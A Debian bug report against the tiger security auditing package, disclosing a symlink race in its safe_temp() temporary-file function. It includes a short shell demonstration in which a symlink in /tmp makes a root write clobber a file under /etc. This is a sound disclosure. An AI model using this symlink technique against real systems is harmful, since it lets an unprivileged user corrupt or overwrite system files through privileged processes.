Package: tiger
Version: 3.2.1-35
Severity: important
Tags: security
|#
|# Given a temporary file determines if it exists
|# if it does bails out since it shouldn't be there
|safe_temp()
|{
| for __tmpfile
| do
| if [ -f "$__tmpfile" ] ; then
| echo "--ERROR-- [init009e] Tempfile \`$__tmpfile' exists."
| exit 1
| else
| >$__tmpfile
| fi
| done
|}
This is apparently supposed to be a safe and portable way of making tempfiles;
but tempfile wrappers are essentially guaranteed to be unsafe.
|$ ln -sv /etc/passwd-HAX0RED /tmp/tiger
|create symbolic link `/tmp/tiger' to `/etc/passwd-HAX0RED'
|$ ls -l /tmp/tiger
|lrwxrwxrwx 1 pryzbyj pryzbyj 19 2007-03-12 13:37 /tmp/tiger ->
/etc/passwd-HAX0RED
|$ [ -e /tmp/tiger ] || echo nope
|nope
|$ > /tmp/tiger
|bash: /tmp/tiger: Permission denied
|$ sudo sh -c '> /tmp/tiger'
|Password:
|$ [ -e /tmp/tiger ] || echo nope
|$ ls -l /tmp/tiger
|lrwxrwxrwx 1 pryzbyj pryzbyj 19 2007-03-12 13:37 /tmp/tiger ->
/etc/passwd-HAX0RED
|$ [ -e /etc/passwd-HAX0RED ] || echo nope
|$ sudo rm /etc/passwd-HAX0RED
|$ sudo sh -c '> /tmp/passwd-HAX0RED'
|$ ln -sv /etc/passwd-HAX0RED /tmp/tiger
|create symbolic link `/tmp/tiger' to `/etc/passwd-HAX0RED'
|$ sudo sh -c 'echo got ya >/tmp/tiger'
|$ cat /etc/passwd-HAX0RED
|got ya
Repeating with a range of $$ surrounding that expected for a tiger script is
left as an excercize to the reader...
--
To UNSUBSCRIBE, email to [EMAIL PROTECTED]
with a subject of "unsubscribe". Trouble? Contact [EMAIL PROTECTED]
